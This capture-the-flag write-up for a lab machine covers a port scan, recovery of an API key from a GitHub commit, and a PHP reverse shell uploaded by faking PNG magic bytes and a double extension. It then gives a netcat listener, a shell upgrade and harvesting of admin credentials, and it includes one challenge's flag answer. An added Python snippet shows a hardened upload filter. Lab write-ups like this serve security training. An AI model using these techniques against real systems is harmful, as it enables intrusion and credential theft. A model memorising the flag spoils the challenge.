greprtp.md

File metadata and controls

180 lines (100 loc) · 4.97 KB

A challenge that tests your reconnaissance and OSINT skills.

Scanning

Scan the target with a full TCP port scan and service detection:

nmap -sS -sV -T4 -p- 10.10.47.192

Three open web servers (80, 443, 51337).

HTTP

Let's check the web app. Port 80 shows nothing.

Port 443 returns an error.

Referring to the nmap report, I need to add the domain grep.thm to the hosts file:

echo "10.10.47.192  grep.thm" >> /etc/hosts

Now the site loads.

Enumeration

As the hint says, the website is developed by SuperSecure Corp and is still under development.

After a bit of research I found it on GitHub by searching for "SearchME" AND "This website is under development".

Exactly what we need: only 4 commits, and it's a new project.

I found some endpoints here.

I tried to register an account, but it needs an API key.

I can easily get the key from a commit named "remove key".

Open Burp Suite, intercept the request, and change X-THM-API-Key to our key.

After logging in, we get the first flag.

Flag: First flag
Answer: THM{4ec9806d7e1350270dc402ba870ccebb}

Exploitation

Another endpoint, upload.php, lets us upload images to /uploads.

cp /usr/share/webshells/php/php-reverse-shell.php .
vi php-reverse-shell.php

Remember, the web server filters files by two things: extension and magic bytes.

So we need to change both the extension and the first bytes of the file.

mv php-reverse-shell.php reverse.png.php
vi reverse.png.php

Pad some characters at the beginning of the file, then overwrite the padding with the PNG magic bytes (Ctrl+X saves and exits hexedit; xxd confirms the header):

hexedit reverse.png.php
89 50 4e 47
Ctrl+X
xxd reverse.png.php | head

The file uploads successfully.
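The upload filter described above, looked at from the defender's side: an added Python example (not the challenge's own code) that puts an assumed weak check, which accepts reverse.png.php, beside a hardened check that rejects double extensions, requires the signature to match the final extension, and stores files under a server-chosen name. The sample bytes and the signature table are constructed.

```python
"""Upload filter: an assumed weak check beside a hardened one (added example)."""
import os
import uuid

# Signature bytes keyed by the one extension they belong to (constructed table).
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

# Constructed samples: a PNG header glued to a PHP stub, and a plain PNG fragment.
WEBSHELL_PNG = MAGIC["png"] + b"<?php /* constructed stand-in for a PHP body */ ?>"
REAL_PNG = MAGIC["png"] + b"\x00\x00\x00\rIHDR"


def naive_check(filename: str, data: bytes) -> bool:
    """Assumed weak filter: an allowed extension anywhere in the name plus any known signature."""
    has_ext = any("." + ext in filename.lower() for ext in MAGIC)
    has_magic = any(data.startswith(sig) for sig in MAGIC.values())
    return has_ext and has_magic


def hardened_check(filename: str, data: bytes) -> bool:
    """Final extension only, exactly one dot, signature must match that type, no PHP tags."""
    base = os.path.basename(filename)
    if base.count(".") != 1:  # rejects reverse.png.php and evil.php.png alike
        return False
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in MAGIC or not data.startswith(MAGIC[ext]):
        return False
    # Defence in depth: a valid image header followed by PHP tags is still not an image.
    return b"<?php" not in data and b"<?=" not in data


def store_name(ext: str) -> str:
    """Server-chosen name so the client's filename never reaches the filesystem."""
    if ext not in MAGIC:
        raise ValueError("unsupported type")
    return uuid.uuid4().hex + "." + ext


if __name__ == "__main__":
    for name, data in [("reverse.png.php", WEBSHELL_PNG), ("photo.png", REAL_PNG)]:
        print(name, "naive:", naive_check(name, data), "hardened:", hardened_check(name, data))
```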

Start a listener:

nc -vlnp 1234

Go to https://grep.thm/api/uploads/ and click our file.

We get our shell. Upgrade it to an interactive TTY:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z
stty raw -echo; fg

I found nothing in the home folders, but in /var/www there are two interesting folders.

We only have permission on user.sql, which may contain the admin's email.

cd backup
grep admin user.sql

Back to leakchecker: there are a lot of certificates in the web folder, and I think they relate to a domain.

echo "10.10.47.192  leakchecker.grep.thm" >> /etc/hosts

You can find it on port 51337 from the previous nmap scan.

Just enter the admin's email to get the password.

Flag: user.txt
Answer: